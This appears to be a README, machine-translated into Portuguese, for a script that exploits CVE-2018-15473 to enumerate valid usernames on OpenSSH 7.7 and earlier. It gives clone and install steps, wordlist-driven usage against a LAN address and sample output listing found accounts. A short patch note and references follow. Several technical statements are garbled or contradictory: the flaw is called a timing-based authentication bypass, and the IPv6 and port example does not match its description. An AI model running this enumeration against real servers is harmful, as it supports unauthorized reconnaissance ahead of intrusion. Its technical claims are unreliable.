
Ferramenta de enumeração de nomes de usuário SSH que explora a CVE-2018-15473 para identificar usuários válidos em servidores OpenSSH através de bypass de autenticação baseado em tempo.
O servidor OpenSSH não atrasa o processamento de um usuário de autenticação inválida antes de analisar completamente o pacote que contém a solicitação. Esta vulnerabilidade está relacionada a auth2-gss.c, auth2-hostbased.c, auth2-pubkey.c.
Embora esta vulnerabilidade não possa ser usada para gerar uma lista de nomes de usuário válidos, ainda pode ser usada para enumerar e adivinhar nomes de usuário.
OpenSSH <= 7.7
openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27
Você pode precisar instalar o pacote equivalente ao openssl-dev da sua distribuição
# 注意:如果您在kali上安装,则可以跳过pip安装,只需执行下面第一二三行的步骤,因为paramiko已经存在。
git clone https://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
chmod u+x ssh-username-enum.py
pip install -r requirements.txt
# 或者使用以下命令下载安装
pipenv install -r requirements.txt # if you're cool like that
chmod u+x ssh-username-enum.py
Exemplo 1: Enumeração de usuário único
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
[+] root found!
Exemplo 2: Enumeração de múltiplos usuários usando 10 threads (thread padrão é 4)
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
[+] man found!
[+] guest found!
[+] nobody found!
[!] SSH negotiation failed for user nobody4.
[+] lpadmin found!
etc
Exemplo 3: Endereço IPv6 e especificação da porta SSH
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
[+] ROOT found!
[+] syslog found!
[+] sslh found!
[!] SSH negotiation failed for user sssd.
[+] rfindd found!
[+] ultra found!
etc
Recomenda-se que os usuários atualizem para a versão não afetada. E o projeto OpenBSD já lançou uma correção de código-fonte no seguinte link: https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
https://github.com/epi052/cve-2018-15473
http://blog.nsfocus.net/openssh-cve-2018-15919/